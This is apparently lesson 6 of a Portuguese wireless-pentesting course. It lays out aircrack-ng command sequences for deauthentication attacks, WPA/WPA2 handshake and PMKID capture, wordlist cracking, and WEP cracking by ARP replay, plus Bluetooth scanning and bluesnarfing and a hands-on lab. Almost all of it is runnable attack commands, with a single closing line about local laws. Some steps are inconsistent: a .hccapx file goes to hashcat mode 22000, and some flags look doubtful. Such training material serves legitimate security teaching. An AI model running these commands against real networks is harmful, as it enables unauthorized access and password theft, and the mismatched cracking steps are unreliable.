Exploração Wireless
Aula 6 de 7
Aircrack-ng Suite
Modo Monitor
# Listar interfaces wireless
iwconfig
airmon-ng
# Ativar modo monitor
airmon-ng start wlan0
airmon-ng start wlan0 6 # Canal específico
# Verificar se modo monitor está ativo
iwconfig wlan0mon
# Desativar modo monitor
airmon-ng stop wlan0mon
airodump-ng — Captura de Pacotes
# Escanear redes ao redor
airodump-ng wlan0mon
# Capturar handshake de uma rede específica
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon
# Parâmetros:
# -c 6 : canal
# --bssid : MAC do AP alvo
# -w captura : prefixo do arquivo de saída
# Capturar PMKID (PSK hash do AP)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w pmkid wlan0mon --pmkid
aireplay-ng — Injeção de Pacotes
# Deauth attack (forçar cliente a reconectar)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENTE:MAC wlan0mon
# -0 5 : 5 pacotes deauth
# -a : MAC do AP
# -c : MAC do cliente (opcional, sem = broadcast)
# Testar injeção
aireplay-ng -9 wlan0mon
# ARP replay attack (gera novos IVs para WEP)
aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h CLIENTE:MAC wlan0mon
aircrack-ng — Cracking
# Crack WPA/WPA2 handshake com wordlist
aircrack-ng -w rockyou.txt captura-01.cap
# Verificar se .cap contém handshake (4-way handshake)
aircrack-ng captura-01.cap
# Crack PMKID
aircrack-ng -w rockyou.txt pmkid-01.cap
# Usar hashcat para acelerar cracking da captura (mais rápido)
# Converter .cap para .hccapx
aircrack-ng captura-01.cap -J output
hashcat -m 22000 output.hccapx rockyou.txt
WPA/WPA2 Cracking
Fluxo Completo
# 1. Ativar modo monitor
airmon-ng start wlan0
# 2. Escanear redes
airodump-ng wlan0mon
# 3. Capturar tráfego do alvo (deixe rodando)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# 4. Em outro terminal, enviar deauth attack
aireplay-ng -0 3 -a AA:BB:CC:DD:EE:FF wlan0mon
# 5. Parar airodump após obter [WPA Handshake] na tela
# 6. Verificar handshake
aircrack-ng handshake-01.cap
# 7. Crack
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap
PMKID Attack
# Alternativa ao handshake — não precisa de cliente conectado!
# O PMKID está no primeiro frame do AP
airodump-ng --bssid AA:BB:CC:DD:EE:FF -w pmkid wlan0mon
# Verificar se capturou PMKID (se arquivo tem conteúdo)
wc -c pmkid-01.cap
WEP Cracking
# WEP é quebrado com IVs (vetores de inicialização fracos)
# Capturar IVs
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_crack wlan0mon
# Associar cliente falso
aireplay-ng -1 0 -e "NOME_REDE" -a AA:BB:CC:DD:EE:FF -h CLIENTE:MAC wlan0mon
# ARP request replay (gera IVs)
aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h CLIENTE:MAC wlan0mon
# Crack quando tiver ~5000+ IVs
aircrack-ng wep_crack-01.cap
Bluetooth (BlueZ)
# Scan de dispositivos Bluetooth
bluetoothctl
bluetoothctl > scan on
bluetoothctl > devices
bluetoothctl > info <MAC>
bluetoothctl > pair <MAC>
bluetoothctl > connect <MAC>
# Bluetooth clássico (BR/EDR)
hcitool scan # Scan dispositivos
hcitool info <MAC> # Info detalhada
hciconfig hci0 up # Ativar interface
hciconfig hci0 piscan # Tornar visível
# Bluetooth Low Energy (BLE)
gatttool -b <MAC> -I # Interagir com serviço GATT
# Bluesnarfing (obter dados via OBEX)
bluesnarfer -b <MAC>
Wireless Adapters
Compatibilidade
Adaptadores com chipset recomendado para pentest wireless:
Alfa AWUS036ACH (802.11ac, suporta monitor mode + injeção)
Alfa AWUS036NHA (802.11n, Atheros AR9271)
TP-Link TL-WN722N v1 (Atheros — versão v2/v3 NÃO serve)
Panda Wireless PAU05 / PAU06
AWUS036NE (Ralink RT3070)
Requisitos:
- Modo monitor: SIM
- Packet injection: SIM
- Chipset: Atheros, Ralink, Realtek (alguns)
Verificação
# Verificar se adaptador suporta monitor mode
iw list | grep -A 10 "Supported interface modes"
# Verificar chipset
lsusb
dmesg | grep -i wireless
Lab: Wireless na Prática
# 1. Verificar interface wireless
iwconfig
# 2. Iniciar modo monitor
airmon-ng start wlan0
# 3. Escanear redes
airodump-ng wlan0mon
# 4. Capturar handshake (substituir MAC e CANAL)
airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w teste wlan0mon
# 5. Forçar deauth em outro terminal
aireplay-ng -0 2 -a 00:11:22:33:44:55 wlan0mon
# 6. Verificar handshake
aircrack-ng teste-01.cap
# 7. Limpar
airmon-ng stop wlan0mon
Wireless pentesting requer hardware específico para monitor mode e injeção. PMKID attack é preferível ao handshake (não precisa de cliente). WEP é trivial de quebrar. Sempre alinhe com as leis locais antes de testar.